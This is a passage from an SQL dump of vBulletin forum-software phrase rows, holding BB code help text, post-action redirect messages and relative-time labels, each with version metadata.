(35298, -1, 'noparse_tag_allows', 'fronthelp', 'The [noparse] tag allows you to stop the parsing of BB code.', 'vbulletin', 'vBulletin Solutions', 1206964233, '3.7.0 Release Candidate 2'),
(35299, -1, 'not_linked', 'fronthelp', 'Not linked', 'vbulletin', '', 0, ''),
(35300, -1, 'note_the_id_is_just_an_example', 'fronthelp', '(Note: The threadid/postid is just an example and may not link to a valid thread/post.)', 'vbulletin', '', 0, ''),
(35301, -1, 'php_tag_performs', 'fronthelp', 'The [php] tag performs the same function as the [code] tag, but also adds syntax highlighting for PHP code. Although it is designed for PHP, it may correctly highlight some other C-like languages.', 'vbulletin', '', 0, ''),
(35302, -1, 'post_linking', 'fronthelp', 'Post Linking', 'vbulletin', '', 0, ''),
(35303, -1, 'post_tag_allows', 'fronthelp', 'The [post] tag allows you to link to posts by specifying the post id. You can include an optional parameter to \'name\' your link.', 'vbulletin', '', 0, ''),
(35304, -1, 'postid', 'fronthelp', 'postid', 'vbulletin', '', 0, ''),
(35305, -1, 'quote_tag_allows', 'fronthelp', 'The [quote] tag allows you to attribute text to someone else.', 'vbulletin', '', 0, ''),
(35306, -1, 'resulting_graphic', 'fronthelp', 'Resulting Graphic', 'vbulletin', '', 0, ''),
(35307, -1, 'right', 'fronthelp', 'Right', 'vbulletin', '', 0, ''),
(35308, -1, 'search_faq', 'fronthelp', 'Search FAQ', 'vbulletin', '', 0, ''),
(35309, -1, 'search_in', 'fronthelp', 'Search in', 'vbulletin', '', 0, ''),
(35310, -1, 'search_titles_and_text', 'fronthelp', 'Search Titles & Text', 'vbulletin', '', 0, ''),
(35311, -1, 'search_words', 'fronthelp', 'Search Word(s)', 'vbulletin', '', 0, ''),
(35312, -1, 'showing_avatars_x_to_y_of_z', 'fronthelp', 'Showing Avatars {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925247, '3.7.0 Release Candidate 1'),
(35313, -1, 'signature_picture', 'fronthelp', 'Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35314, -1, 'signature_picture_description', 'fronthelp', 'Signature Picture Description (optional)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35315, -1, 'sigpic_tag_allows', 'fronthelp', 'The [sigpic] tag allows you to insert your uploaded signature picture into your signature. This tag does not work in posts and will not work if you have not uploaded a signature picture.', 'vbulletin', 'vBulletin Solutions', 1161272671, '3.6.3'),
(35316, -1, 'size', 'fronthelp', 'Size', 'vbulletin', '', 0, ''),
(35317, -1, 'size_tag_allows', 'fronthelp', 'The [size] tag allows you to change the size of your text.', 'vbulletin', '', 0, ''),
(35318, -1, 'smilies_are_small_images', 'fronthelp', '\'Smilies\' are small graphical images that can be used to convey an emotion or feeling.\r\n If you have used email or internet chat, you are likely familiar with the smilie concept.\r\n Certain standard strings are automatically converted into smilies.\r\n Try twisting your head on one side if you do not \'get\' smilies;\r\n using a bit of imagination should reveal a face of some description. \r\n \r\n If you want to disable smilies in a post that you make, you can select the \'Disable Smilies\' option\r\n when posting. This is particularly useful if you are posting program code and you do not\r\n want ;) converted to a smilie face!', 'vbulletin', '', 0, ''),
(35319, -1, 'stop_bbcode_parsing', 'fronthelp', 'Stop BB Code Parsing', 'vbulletin', 'vBulletin Solutions', 1206964770, '3.7.0 Release Candidate 2'),
(35320, -1, 'text_two_sizes_larger_than_normal', 'fronthelp', 'this text is two sizes larger than normal', 'vbulletin', '', 0, ''),
(35321, -1, 'this_text_is_blue', 'fronthelp', 'this text is blue', 'vbulletin', '', 0, ''),
(35322, -1, 'this_text_is_bold', 'fronthelp', 'this text is bold', 'vbulletin', '', 0, ''),
(35323, -1, 'this_text_is_center_aligned', 'fronthelp', 'this text is center-aligned', 'vbulletin', '', 0, ''),
(35324, -1, 'this_text_is_courier_font', 'fronthelp', 'this text is in the courier font', 'vbulletin', '', 0, ''),
(35325, -1, 'this_text_is_highlighted', 'fronthelp', 'this text is highlighted', 'vbulletin', '', 0, ''),
(35326, -1, 'this_text_is_indented', 'fronthelp', 'this text is indented', 'vbulletin', '', 0, ''),
(35327, -1, 'this_text_is_italic', 'fronthelp', 'this text is italic', 'vbulletin', '', 0, ''),
(35328, -1, 'this_text_is_left_aligned', 'fronthelp', 'this text is left-aligned', 'vbulletin', '', 0, ''),
(35329, -1, 'this_text_is_right_aligned', 'fronthelp', 'this text is right-aligned', 'vbulletin', '', 0, ''),
(35330, -1, 'this_text_is_underlined', 'fronthelp', 'this text is underlined', 'vbulletin', '', 0, ''),
(35331, -1, 'thread_linking', 'fronthelp', 'Thread Linking', 'vbulletin', '', 0, ''),
(35332, -1, 'thread_tag_allows', 'fronthelp', 'The [thread] tag allows you to link to threads by specifying the thread id. You can include an optional parameter to \'name\' your link.', 'vbulletin', '', 0, ''),
(35333, -1, 'threadid', 'fronthelp', 'threadid', 'vbulletin', '', 0, ''),
(35334, -1, 'underline', 'fronthelp', 'Underline', 'vbulletin', '', 0, ''),
(35335, -1, 'url_hyperlinking', 'fronthelp', 'URL Hyperlinking', 'vbulletin', '', 0, ''),
(35336, -1, 'url_tag_allows', 'fronthelp', 'The [url] tag allows you to link to other websites and files. You can include an optional parameter to \'name\' your link.', 'vbulletin', '', 0, ''),
(35337, -1, 'usage', 'fronthelp', 'Usage', 'vbulletin', '', 0, ''),
(35338, -1, 'value', 'fronthelp', 'value', 'vbulletin', '', 0, ''),
(35339, -1, 'vbulletin_forums_post_269302', 'fronthelp', '{1} - Post 269302', 'vbulletin', '', 0, ''),
(35340, -1, 'vbulletin_forums_thread_42918', 'fronthelp', '{1} - Thread 42918', 'vbulletin', '', 0, ''),
(35341, -1, 'what_to_type', 'fronthelp', 'What to Type', 'vbulletin', '', 0, ''),
(35342, -1, 'x_requiring_at_least_y_posts', 'fronthelp', '{1} Requiring at Least {2} Posts', 'vbulletin', '', 0, ''),
(35343, -1, 'action_cancelled', 'frontredirect', 'Action Cancelled', 'vbulletin', 'vBulletin Solutions', 1195324017, '3.7.0 Beta 1'),
(35344, -1, 'addlist_contact', 'frontredirect', '$userinfo[username] has now been successfully added to your contacts. You will now be returned to where you were.', 'vbulletin', 'vBulletin Solutions', 1196777568, '3.7.0 Beta 1'),
(35345, -1, 'addlist_ignore', 'frontredirect', '$userinfo[username] has now been successfully added to your ignore list. You will now be returned to where you were.', 'vbulletin', '', 0, ''),
(35346, -1, 'album_added_edited', 'frontredirect', 'Album added or edited successfully', 'vbulletin', 'vBulletin Solutions', 1192786200, '3.7.0 Beta 1'),
(35347, -1, 'album_deleted', 'frontredirect', 'Album deleted successfully', 'vbulletin', 'vBulletin Solutions', 1192786181, '3.7.0 Beta 1'),
(35348, -1, 'attachdel', 'frontredirect', 'Selected attachments have been deleted.', 'vbulletin', '', 0, ''),
(35349, -1, 'calendaraddevent', 'frontredirect', 'Thanks for adding that event, you will now be returned to the event.', 'vbulletin', '', 0, ''),
(35350, -1, 'calendardeleteevent', 'frontredirect', 'Thanks for deleting that event. You will now be returned to your calendar.', 'vbulletin', '', 0, ''),
(35351, -1, 'calendarmoderated', 'frontredirect', 'Your event will not appear on the calendar until it is approved by a moderator.', 'vbulletin', '', 0, ''),
(35352, -1, 'calendarmoveevent', 'frontredirect', 'The event has been successfully moved / copied. You will now be returned to the event.', 'vbulletin', '', 0, ''),
(35353, -1, 'calendarupdateevent', 'frontredirect', 'Thanks for updating that event, you will be returned to it.', 'vbulletin', '', 0, ''),
(35354, -1, 'contactsalready', 'frontredirect', 'You and $userinfo[username] are already contacts', 'vbulletin', 'vBulletin Solutions', 1208165335, '3.7.0 Release Candidate 4'),
(35355, -1, 'deleted_announcement', 'frontredirect', 'The announcement $announcementinfo[title] has been deleted.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35356, -1, 'deletepost', 'frontredirect', 'The post has been successfully deleted. You will now be returned to the thread.', 'vbulletin', '', 0, ''),
(35357, -1, 'deleteposts', 'frontredirect', 'The selected posts have been deleted. You will now be returned to the thread.', 'vbulletin', '', 0, ''),
(35358, -1, 'deletethread', 'frontredirect', 'The thread has been successfully deleted. You will now be returned to the forum.', 'vbulletin', '', 0, ''),
(35359, -1, 'deleteusernote', 'frontredirect', 'User Note has been deleted and you will now be returned to $userinfo[username]\'s User Notes.', 'vbulletin', '', 0, ''),
(35360, -1, 'dst', 'frontredirect', 'DST Settings Updated', 'vbulletin', '', 0, ''),
(35361, -1, 'duplicatepost', 'frontredirect', 'This post is a duplicate of a post that you have posted in the last five minutes. You will be redirected to that thread.', 'vbulletin', '', 0, ''),
(35362, -1, 'duplicatethread', 'frontredirect', 'This thread is a duplicate of a thread that you have posted in the last five minutes. You will be redirected to the thread listings.', 'vbulletin', '', 0, ''),
(35363, -1, 'editthanks', 'frontredirect', 'The post has been successfully edited. You are now being taken to the post.', 'vbulletin', '', 0, ''),
(35364, -1, 'editthread', 'frontredirect', 'The thread has been successfully edited. You are now being taken to the thread.', 'vbulletin', '', 0, ''),
(35365, -1, 'foldersedited', 'frontredirect', 'Your $itemtype folders have been updated. You will now be returned to your $itemtypes.', 'vbulletin', '', 0, ''),
(35366, -1, 'forumpasswordcorrect', 'frontredirect', 'The password was correctly entered. You are being redirected to where you were.', 'vbulletin', '', 0, ''),
(35367, -1, 'friendadded', 'frontredirect', 'You and $userinfo[username] are now friends', 'vbulletin', 'vBulletin Solutions', 1195171778, '3.7.0 Beta 1'),
(35368, -1, 'friendrequested', 'frontredirect', 'Your friendship request has been sent to $userinfo[username]', 'vbulletin', 'vBulletin Solutions', 1195171768, '3.7.0 Beta 1'),
(35369, -1, 'friendsalready', 'frontredirect', 'You and $userinfo[username] are already friends', 'vbulletin', 'vBulletin Solutions', 1195171759, '3.7.0 Beta 1'),
(35370, -1, 'friendspending', 'frontredirect', 'Your friendship with $userinfo[username] is already pending', 'vbulletin', 'vBulletin Solutions', 1195171734, '3.7.0 Beta 1'),
(35371, -1, 'friendswithself', 'frontredirect', 'You can\'t be friends with yourself', 'vbulletin', 'vBulletin Solutions', 1195235320, '3.7.0 Beta 1'),
(35372, -1, 'groupdiscussiondelete', 'frontredirect', 'Discussion has been deleted. You are now being returned to the group.', 'vbulletin', 'vBulletin Solutions', 1212412503, '3.7.1'),
(35373, -1, 'groupmessage_nodelete', 'frontredirect', 'You have chosen to not delete this message. You are now being returned to the group.', 'vbulletin', 'vBulletin Solutions', 1195595093, '3.7.0 Beta 1'),
(35374, -1, 'groupmessagedelete', 'frontredirect', 'Message has been deleted. You are now being returned to the discussion.', 'vbulletin', 'vBulletin Solutions', 1212412526, '3.7.1'),
(35375, -1, 'groups_picture_changed', 'frontredirect', 'Groups for this picture have been successfully updated', 'vbulletin', 'vBulletin Solutions', 1199224035, '3.7.0 Beta 4'),
(35376, -1, 'infraction_added', 'frontredirect', 'Infraction for this user has been added.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35377, -1, 'infraction_reversed', 'frontredirect', 'Infraction for this user has been reversed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35378, -1, 'inline_approvedattachments', 'frontredirect', 'The selected attachments have been approved.', 'vbulletin', '', 0, ''),
(35379, -1, 'inline_approveddiscussions', 'frontredirect', 'The selected discussions have been approved', 'vbulletin', 'vBulletin Solutions', 1212165298, '3.7.1'),
(35380, -1, 'inline_approvedmessages', 'frontredirect', 'The selected messages have been approved.', 'vbulletin', 'vBulletin Solutions', 1191952288, '3.7.0 Beta 1'),
(35381, -1, 'inline_approvedpictures', 'frontredirect', 'The selected pictures have been approved.', 'vbulletin', 'vBulletin Solutions', 1203723217, '3.7.0 Beta 6'),
(35382, -1, 'inline_approvedposts', 'frontredirect', 'The selected posts have been approved.', 'vbulletin', '', 0, ''),
(35383, -1, 'inline_approvedthreads', 'frontredirect', 'The selected threads have been approved.', 'vbulletin', '', 0, ''),
(35384, -1, 'inline_closed', 'frontredirect', 'The selected threads have been closed.', 'vbulletin', '', 0, ''),
(35385, -1, 'inline_copiedposts', 'frontredirect', 'The selected posts have been copied.', 'vbulletin', 'vBulletin Solutions', 1145645439, '3.6.0 Beta 1'),
(35386, -1, 'inline_deleted', 'frontredirect', 'The selected threads have been deleted.', 'vbulletin', '', 0, ''),
(35387, -1, 'inline_deleteddiscussions', 'frontredirect', 'The selected discussions have been deleted.', 'vbulletin', 'vBulletin Solutions', 1212401324, '3.7.1'),
(35388, -1, 'inline_deletedmessages', 'frontredirect', 'The selected messages have been deleted.', 'vbulletin', 'vBulletin Solutions', 1191952385, '3.7.0 Beta 1'),
(35389, -1, 'inline_deletedpictures', 'frontredirect', 'The selected pictures have been deleted.', 'vbulletin', 'vBulletin Solutions', 1203725390, '3.7.0 Beta 6'),
(35390, -1, 'inline_deletedposts', 'frontredirect', 'The selected posts have been deleted.', 'vbulletin', '', 0, ''),
(35391, -1, 'inline_mergedposts', 'frontredirect', 'The selected posts have been merged.', 'vbulletin', '', 0, ''),
(35392, -1, 'inline_mergedthreads', 'frontredirect', 'The selected threads have been merged.', 'vbulletin', '', 0, ''),
(35393, -1, 'inline_messagelist_cleared', 'frontredirect', 'The message list has been cleared.', 'vbulletin', 'vBulletin Solutions', 1191952152, '3.7.0 Beta 1'),
(35394, -1, 'inline_moved', 'frontredirect', 'The selected threads have been moved.', 'vbulletin', '', 0, ''),
(35395, -1, 'inline_movedposts', 'frontredirect', 'The selected posts have been moved.', 'vbulletin', '', 0, ''),
(35396, -1, 'inline_opened', 'frontredirect', 'The selected threads have been opened.', 'vbulletin', '', 0, ''),
(35397, -1, 'inline_postlist_cleared', 'frontredirect', 'The post list has been cleared.', 'vbulletin', '', 0, ''),
(35398, -1, 'inline_stuck', 'frontredirect', 'The selected threads have been stuck.', 'vbulletin', '', 0, ''),
(35399, -1, 'inline_threadlist_cleared', 'frontredirect', 'The thread list has been cleared.', 'vbulletin', '', 0, ''),
(35400, -1, 'inline_unapprovedattachments', 'frontredirect', 'The selected attachments have been unapproved.', 'vbulletin', '', 0, ''),
(35401, -1, 'inline_unapproveddiscussions', 'frontredirect', 'The selected discussions have been unapproved', 'vbulletin', 'vBulletin Solutions', 1212165388, '3.7.1'),
(35402, -1, 'inline_unapprovedmessages', 'frontredirect', 'The selected messages have been unapproved.', 'vbulletin', 'vBulletin Solutions', 1191952302, '3.7.0 Beta 1'),
(35403, -1, 'inline_unapprovedposts', 'frontredirect', 'The selected posts have been placed back into moderation.', 'vbulletin', '', 0, ''),
(35404, -1, 'inline_unapprovedthreads', 'frontredirect', 'The selected threads have been placed back into moderation.', 'vbulletin', '', 0, ''),
(35405, -1, 'inline_undeleted', 'frontredirect', 'The selected threads have been undeleted.', 'vbulletin', '', 0, ''),
(35406, -1, 'inline_undeleteddiscussions', 'frontredirect', 'The selected discussions have been undeleted.', 'vbulletin', 'vBulletin Solutions', 1212415886, '3.7.1'),
(35407, -1, 'inline_undeletedmessages', 'frontredirect', 'The selected messages have been undeleted.', 'vbulletin', 'vBulletin Solutions', 1191952432, '3.7.0 Beta 1'),
(35408, -1, 'inline_undeleteposts', 'frontredirect', 'The selected posts have been undeleted.', 'vbulletin', 'vBulletin Solutions', 1142555568, '3.6.0 Beta 1'),
(35409, -1, 'inline_unstuck', 'frontredirect', 'The selected threads have been unstuck.', 'vbulletin', '', 0, ''),
(35410, -1, 'join_requests_processed', 'frontredirect', 'Join requests have been processed.', 'vbulletin', '', 0, ''),
(35411, -1, 'login', 'frontredirect', 'Thank you for logging in, $bbuserinfo[username].', 'vbulletin', '', 0, ''),
(35412, -1, 'logout', 'frontredirect', 'Logging you out, $bbuserinfo[username].', 'vbulletin', '', 0, ''),
(35413, -1, 'lostactivatecode', 'frontredirect', 'Your account details and activation code have been sent to that email address. You will now be returned to where you were.', 'vbulletin', '', 0, ''),
(35414, -1, 'lostpw', 'frontredirect', 'Your username and details about how to reset your password have been sent to you by email. You will now be returned to where you were.', 'vbulletin', 'vBulletin Solutions', 1245085058, '3.8.3'),
(35415, -1, 'markread', 'frontredirect', 'All forums have been marked as read and the new post indicators will now be off.', 'vbulletin', '', 0, ''),
(35416, -1, 'markread_single', 'frontredirect', 'This forum has been marked as read and its new post indicator will now be off.', 'vbulletin', '', 0, ''),
(35417, -1, 'mergethread', 'frontredirect', 'Those threads have been successfully merged. You will now be returned to the result of the merging.', 'vbulletin', '', 0, ''),
(35418, -1, 'movethread', 'frontredirect', 'The thread has been successfully moved / copied. You will now be returned to the thread.', 'vbulletin', '', 0, ''),
(35419, -1, 'nodelete', 'frontredirect', 'You have chosen not to delete this post. You are now being returned to the thread.', 'vbulletin', '', 0, ''),
(35420, -1, 'nodeletenote', 'frontredirect', 'You will be returned to $userinfo[username]\'s User Notes.', 'vbulletin', '', 0, ''),
(35421, -1, 'notice_dismissed', 'frontredirect', 'Notice dismissed.', 'vbulletin', 'vBulletin Solutions', 1219935458, '3.8.0 Alpha 1'),
(35422, -1, 'openclose', 'frontredirect', 'The thread has been successfully $action. You are now being taken to the thread.', 'vbulletin', '', 0, ''),
(35423, -1, 'payment_complete', 'frontredirect', 'Payment Complete', 'vbulletin', '', 0, ''),
(35424, -1, 'picture_removed_from_group', 'frontredirect', 'Picture removed from group successfully', 'vbulletin', 'vBulletin Solutions', 1195324126, '3.7.0 Beta 1'),
(35425, -1, 'picturecomment_deleted', 'frontredirect', 'This comment has been deleted. You are now being returned to the picture.', 'vbulletin', 'vBulletin Solutions', 1200402736, '3.7.0 Beta 4'),
(35426, -1, 'picturecomment_editthanks', 'frontredirect', 'The comment has been successfully edited. You are now being taken to the comment.', 'vbulletin', 'vBulletin Solutions', 1200402667, '3.7.0 Beta 4'),
(35427, -1, 'picturecomment_nodelete', 'frontredirect', 'You have chosen to not delete this comment. You are now being returned to the picture.', 'vbulletin', 'vBulletin Solutions', 1200402781, '3.7.0 Beta 4'),
(35428, -1, 'picturecomment_thanks', 'frontredirect', 'Thank you for posting! You will now be taken to your comment.', 'vbulletin', 'vBulletin Solutions', 1200402701, '3.7.0 Beta 4'),
(35429, -1, 'pictures_added', 'frontredirect', 'Pictures added successfully', 'vbulletin', 'vBulletin Solutions', 1195318068, '3.7.0 Beta 1'),
(35430, -1, 'pictures_updated', 'frontredirect', 'Pictures updated successfully', 'vbulletin', 'vBulletin Solutions', 1192786211, '3.7.0 Beta 1'),
(35431, -1, 'pictures_uploaded', 'frontredirect', 'Pictures uploaded successfully', 'vbulletin', 'vBulletin Solutions', 1192786225, '3.7.0 Beta 1'),
(35432, -1, 'pm_allmessagesdeselected', 'frontredirect', 'All messages have been deselected.', 'vbulletin', 'vBulletin Solutions', 1218719684, '3.8.0 Alpha 1'),
(35433, -1, 'pm_messagesdeleted', 'frontredirect', 'The message(s) have been deleted. You are now being redirected to your PM list.', 'vbulletin', '', 0, ''),
(35434, -1, 'pm_messagesent', 'frontredirect', 'Your private message has been sent. You will now be taken to your PM list. Thanks!', 'vbulletin', '', 0, ''),
(35435, -1, 'pm_messagesmarkedas', 'frontredirect', 'Selected Messages Marked as $readunread', 'vbulletin', '', 0, ''),
(35436, -1, 'pm_messagesmoved', 'frontredirect', 'Your message(s) have been moved. You will now be returned to your PM list.', 'vbulletin', '', 0, ''),
(35437, -1, 'pm_receiptsdeleted', 'frontredirect', 'Private Message Receipts Deleted', 'vbulletin', '', 0, ''),
(35438, -1, 'pollvoteduplicate', 'frontredirect', 'You have already voted on this poll. You will be redirected to that poll.', 'vbulletin', 'vBulletin Solutions', 1204657411, '3.7.0 Beta 6'),
(35439, -1, 'pollvotethanks', 'frontredirect', 'Thank you for voting. You will now be taken back to the poll.', 'vbulletin', '', 0, ''),
(35440, -1, 'post_manage', 'frontredirect', 'This post was successfully managed. You are now being redirected to it.', 'vbulletin', '', 0, ''),
(35441, -1, 'postthanks', 'frontredirect', 'Thank you for posting! You will now be taken to your post. If you opted to post a poll, you will now be allowed to do so.', 'vbulletin', 'vBulletin Solutions', 1142900764, '3.6.0 Beta 1'),
(35442, -1, 'postthanks_moderate', 'frontredirect', 'Thank you for posting! Your post will not be visible until a moderator has approved it for posting. You will now be taken back to the forum. If you opted to post a poll, you will now be allowed to do so.', 'vbulletin', 'vBulletin Solutions', 1150845831, '3.6.0 Beta 3'),
(35443, -1, 'postthanks_nopermission', 'frontredirect', 'Thank you for posting! You will now be taken back to the forum since you do not have permission to view thread content in this forum. If you opted to post a poll, you will now be allowed to do so.', 'vbulletin', 'vBulletin Solutions', 1197326030, '3.7.0 Beta 1'),
(35444, -1, 'redirects_removed', 'frontredirect', 'Thread moved redirects successfully removed. You are now being redirected back to the thread.', 'vbulletin', '', 0, ''),
(35445, -1, 'reminderdeleted', 'frontredirect', 'Reminder(s) have been deleted. You will now be returned to your current event reminders.', 'vbulletin', '', 0, ''),
(35446, -1, 'reminderupdated', 'frontredirect', 'Reminder(s) have been updated. You will now be returned to your current event reminders.', 'vbulletin', '', 0, ''),
(35447, -1, 'removedusers', 'frontredirect', 'Users removed from usergroup.', 'vbulletin', '', 0, ''),
(35448, -1, 'removelist_buddy', 'frontredirect', '$userinfo[username] has now been successfully removed from your contacts. You will now be returned to where you were.', 'vbulletin', 'vBulletin Solutions', 1196430406, '3.7.0 Beta 1'),
(35449, -1, 'removelist_friend', 'frontredirect', 'Your friendship with $userinfo[username] has been broken', 'vbulletin', 'vBulletin Solutions', 1195753794, '3.7.0 Beta 1'),
(35450, -1, 'removelist_ignore', 'frontredirect', '$userinfo[username] has now been successfully removed from your ignore list. You will now be returned to where you were.', 'vbulletin', '', 0, ''),
(35451, -1, 'reportthanks', 'frontredirect', 'Thank you for reporting that post. It will be dealt with as appropriate in due course.', 'vbulletin', '', 0, ''),
(35452, -1, 'reputationadd', 'frontredirect', 'Thanks for adding reputation to this user. May you be lucky enough to receive the same Reputation back in turn.', 'vbulletin', 'vBulletin Solutions', 1217252120, '3.8.0 Alpha 1'),
(35453, -1, 'reputationminus', 'frontredirect', 'Thanks for deducting reputation from this user.', 'vbulletin', 'vBulletin Solutions', 1217252212, '3.8.0 Alpha 1'),
(35454, -1, 'saved_announcement', 'frontredirect', 'The announcement $title has been successfully saved.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(35455, -1, 'search', 'frontredirect', 'Your search is in progress and you will be taken to the results in a moment. Thank you for your patience.', 'vbulletin', '', 0, ''),
(35456, -1, 'search_preferencescleared', 'frontredirect', 'Search Preferences Cleared', 'vbulletin', 'vBulletin Solutions', 1166835566, '3.6.5'),
(35457, -1, 'search_preferencessaved', 'frontredirect', 'Search Preferences Saved', 'vbulletin', '', 0, ''),
(35458, -1, 'sentemail', 'frontredirect', 'We have sent your email to $sendtoname. You will now be returned to the thread.', 'vbulletin', '', 0, ''),
(35459, -1, 'sentfeedback', 'frontredirect', 'Your feedback to the webmaster has been sent.', 'vbulletin', '', 0, ''),
(35460, -1, 'sticky', 'frontredirect', 'The thread has been successfully $action. You are now being taken to the thread.', 'vbulletin', '', 0, ''),
(35461, -1, 'sub_threadsmoved', 'frontredirect', 'Your thread(s) have been moved. You will now be returned to your subscriptions.', 'vbulletin', '', 0, ''),
(35462, -1, 'submove', 'frontredirect', 'Your thread(s) have been moved. You will now be returned to your subscriptions.', 'vbulletin', '', 0, ''),
(35463, -1, 'subsadd_discussion', 'frontredirect', 'A subscription for this discussion has been added.', 'vbulletin', 'vBulletin Solutions', 1213715753, '3.7.1'),
(35464, -1, 'subsadd_event', 'frontredirect', 'A notification for this event has been added.', 'vbulletin', '', 0, ''),
(35465, -1, 'subsadd_forum', 'frontredirect', 'A subscription for this forum has been added.', 'vbulletin', '', 0, ''),
(35466, -1, 'subsadd_group', 'frontredirect', 'A subscription for this social group has been added.', 'vbulletin', 'vBulletin Solutions', 1213716705, '3.7.1'),
(35467, -1, 'subsadd_thread', 'frontredirect', 'A subscription for this thread has been added.', 'vbulletin', '', 0, ''),
(35468, -1, 'subsremove_discussion', 'frontredirect', 'Your subscription for this discussion has been removed.', 'vbulletin', 'vBulletin Solutions', 1213715649, '3.7.1'),
(35469, -1, 'subsremove_event', 'frontredirect', 'Your notification for this event has been removed.', 'vbulletin', '', 0, ''),
(35470, -1, 'subsremove_forum', 'frontredirect', 'Your subscription for this forum has been removed.', 'vbulletin', '', 0, ''),
(35471, -1, 'subsremove_group', 'frontredirect', 'Your subscription for this social group has been removed.', 'vbulletin', 'vBulletin Solutions', 1213715678, '3.7.1'),
(35472, -1, 'subsremove_thread', 'frontredirect', 'Your subscription for this thread has been removed.', 'vbulletin', '', 0, ''),
(35473, -1, 'subupdate', 'frontredirect', 'Subscription(s) have been updated. You will now be returned to your current subscriptions.', 'vbulletin', '', 0, ''),
(35474, -1, 'successfully_created_group', 'frontredirect', 'Group was created successfully.', 'vbulletin', 'vBulletin Solutions', 1193762458, '3.7.0 Beta 1'),
(35475, -1, 'successfully_deleted_group', 'frontredirect', 'You have successfully deleted the group', 'vbulletin', 'vBulletin Solutions', 1199126948, '3.7.0 Beta 4'),
(35476, -1, 'successfully_edited_group', 'frontredirect', 'Group was updated successfully.', 'vbulletin', 'vBulletin Solutions', 1193762299, '3.7.0 Beta 1'),
(35477, -1, 'successfully_invited_user', 'frontredirect', 'User Invited Successfully', 'vbulletin', 'vBulletin Solutions', 1198710019, '3.7.0 Beta 4'),
(35478, -1, 'successfully_joined_group', 'frontredirect', 'You have joined the group successfully', 'vbulletin', 'vBulletin Solutions', 1199126943, '3.7.0 Beta 4'),
(35479, -1, 'successfully_kicked_members', 'frontredirect', 'Group members removed successfully', 'vbulletin', 'vBulletin Solutions', 1201260283, '3.7.0 Beta 5'),
(35480, -1, 'successfully_left_group', 'frontredirect', 'You have successfully left the group.', 'vbulletin', 'vBulletin Solutions', 1193762552, '3.7.0 Beta 1'),
(35481, -1, 'successfully_managed_members', 'frontredirect', 'Group membership updated successfully', 'vbulletin', 'vBulletin Solutions', 1198777534, '3.7.0 Beta 4'),
(35482, -1, 'successfully_removed_invites', 'frontredirect', 'Invited users successfully removed', 'vbulletin', 'vBulletin Solutions', 1199126922, '3.7.0 Beta 4'),
(35483, -1, 'thread_approved', 'frontredirect', 'The thread has been approved and moved out of the moderation queue.', 'vbulletin', 'vBulletin Solutions', 1212676451, '3.8.0 Alpha 1'),
(35484, -1, 'thread_unapproved', 'frontredirect', 'The thread has been unapproved and moved into the moderation queue.', 'vbulletin', 'vBulletin Solutions', 1212676469, '3.8.0 Alpha 1'),
(35485, -1, 'threadclosed', 'frontredirect', 'Sorry! This thread is closed! You will now be returned to the thread.', 'vbulletin', '', 0, ''),
(35486, -1, 'threadrate_add', 'frontredirect', 'Your vote on this thread has been added.', 'vbulletin', '', 0, ''),
(35487, -1, 'threadrate_update', 'frontredirect', 'Your vote on this thread has been updated.', 'vbulletin', '', 0, ''),
(35488, -1, 'updatelist_buddy', 'frontredirect', 'Your contact list has been updated.', 'vbulletin', 'vBulletin Solutions', 1196773591, '3.7.0 Beta 1'),
(35489, -1, 'updatelist_ignore', 'frontredirect', 'Your ignore list has been updated.', 'vbulletin', '', 0, ''),
(35490, -1, 'updatelist_incoming', 'frontredirect', 'Your incoming friendship request list has been updated.', 'vbulletin', 'vBulletin Solutions', 1195754569, '3.7.0 Beta 1'),
(35491, -1, 'updatethanks', 'frontredirect', 'Thank you for updating your profile, $bbuserinfo[username].', 'vbulletin', '', 0, ''),
(35492, -1, 'updatethanks_newemail', 'frontredirect', 'Thank you for updating your profile, $bbuserinfo[username]. Because you changed your email address, you will be sent an email to verify its existence.', 'vbulletin', '', 0, ''),
(35493, -1, 'usercss_saved', 'frontredirect', 'Your customizations have been saved', 'vbulletin', 'vBulletin Solutions', 1193325882, '3.7.0 Beta 1'),
(35494, -1, 'usercss_toggled', 'frontredirect', 'Your preference for viewing user profile style customizations has been switched successfully.', 'vbulletin', 'vBulletin Solutions', 1196438156, '3.7.0 Beta 1'),
(35495, -1, 'usergroup_displaygroupupdated', 'frontredirect', 'Your primary display group is now $usergroup[title]', 'vbulletin', '', 0, ''),
(35496, -1, 'usergroup_nolongermember', 'frontredirect', 'You are no longer a member of this usergroup.', 'vbulletin', '', 0, ''),
(35497, -1, 'usergroup_requested', 'frontredirect', 'Your request to join this usergroup has been logged.', 'vbulletin', '', 0, ''),
(35498, -1, 'usergroup_welcome', 'frontredirect', 'Congratulations, you are now a member of the $usergroupname usergroup.', 'vbulletin', '', 0, ''),
(35499, -1, 'usernoteaddevent', 'frontredirect', 'Your note regarding $userinfo[username] has been recorded.', 'vbulletin', '', 0, ''),
(35500, -1, 'visitormessage_nodelete', 'frontredirect', 'You have chosen to not delete this message. You are now being returned to the user\'s profile.', 'vbulletin', 'vBulletin Solutions', 1191952600, '3.7.0 Beta 1'),
(35501, -1, 'visitormessagedelete', 'frontredirect', 'Message has been deleted. You are now being returned to the user\'s profile.', 'vbulletin', 'vBulletin Solutions', 1191952566, '3.7.0 Beta 1'),
(35502, -1, 'visitormessageeditthanks', 'frontredirect', 'The comment has been successfully edited. You are now being taken to the comment.', 'vbulletin', 'vBulletin Solutions', 1196724950, '3.7.0 Beta 1'),
(35503, -1, 'visitormessagethanks', 'frontredirect', 'Thank you for posting! You will now be taken to your message.', 'vbulletin', 'vBulletin Solutions', 1191952471, '3.7.0 Beta 1'),
(35504, -1, '1_day_ago', 'global', '1 Day Ago', 'vbulletin', 'vBulletin Solutions', 1150215451, '3.6.0 Beta 3'),
(35505, -1, '1_hour_ago', 'global', '1 Hour Ago', 'vbulletin', '', 0, ''),
(35506, -1, '1_minute_ago', 'global', '1 Minute Ago', 'vbulletin', '', 0, ''),
(35507, -1, '1_week_ago', 'global', '1 Week Ago', 'vbulletin', '', 0, ''),
